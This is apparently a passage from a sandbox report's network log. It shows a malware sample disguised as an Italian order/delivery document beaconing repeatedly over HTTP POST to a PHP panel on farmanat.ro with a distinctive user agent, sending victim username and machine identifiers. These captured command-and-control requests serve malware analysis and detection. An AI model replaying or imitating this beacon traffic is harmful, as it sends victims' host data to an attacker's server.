Nov 25, 2021 10:49:09.682661057 CET	6474	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:08 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
116	192.168.11.20	49956	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:10.109386921 CET	6475	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:10.143734932 CET	6475	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:10.206259012 CET	6476	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:09 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
117	192.168.11.20	49957	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:10.657392025 CET	6476	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:10.691003084 CET	6477	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:10.739757061 CET	6477	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:09 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
118	192.168.11.20	49958	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:11.180607080 CET	6478	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:11.214133978 CET	6478	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:11.266808033 CET	6478	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
119	192.168.11.20	49959	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:11.643884897 CET	6479	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:11.677861929 CET	6479	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:11.727848053 CET	6480	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.11.20	49847	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:08.418318987 CET	6322	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:08.451869965 CET	6322	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:08.506304979 CET	6323	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
120	192.168.11.20	49960	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:12.083952904 CET	6480	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:12.117309093 CET	6481	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:12.177886963 CET	6481	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
121	192.168.11.20	49961	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:12.560857058 CET	6482	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:12.594418049 CET	6482	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:12.649662971 CET	6482	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
122	192.168.11.20	49962	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:13.092994928 CET	6483	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:13.126624107 CET	6483	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:13.183248043 CET	6484	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
123	192.168.11.20	49964	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:13.622407913 CET	6491	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:13.656611919 CET	6491	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:13.706809998 CET	6491	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
124	192.168.11.20	49965	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:14.137401104 CET	6492	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:14.171044111 CET	6492	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:14.220704079 CET	6493	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:13 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
125	192.168.11.20	49966	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:14.671375036 CET	6494	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:14.705666065 CET	6494	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:14.756098986 CET	6494	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:13 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
126	192.168.11.20	49967	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:15.151566982 CET	6495	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:15.185141087 CET	6495	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:15.234466076 CET	6495	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
127	192.168.11.20	49968	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:15.668863058 CET	6496	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:15.703031063 CET	6496	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:15.753048897 CET	6497	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
128	192.168.11.20	49969	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:16.184501886 CET	6497	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:16.218053102 CET	6498	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:16.281188965 CET	6498	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
129	192.168.11.20	49970	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:16.721052885 CET	6499	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:16.755250931 CET	6499	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:16.805708885 CET	6499	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.11.20	49848	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:09.107460976 CET	6323	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:09.141113997 CET	6324	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:09.192800045 CET	6324	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:08 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
130	192.168.11.20	49971	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:17.213581085 CET	6500	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:17.247226954 CET	6500	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:17.299865961 CET	6501	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
131	192.168.11.20	49972	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:17.716881037 CET	6501	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:17.750284910 CET	6502	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:17.799886942 CET	6502	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
132	192.168.11.20	49973	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:18.186520100 CET	6503	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:18.220494032 CET	6503	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:18.273413897 CET	6503	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:17 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
133	192.168.11.20	49974	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:18.695895910 CET	6504	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:18.729501009 CET	6504	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:18.781258106 CET	6505	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:17 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
134	192.168.11.20	49975	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
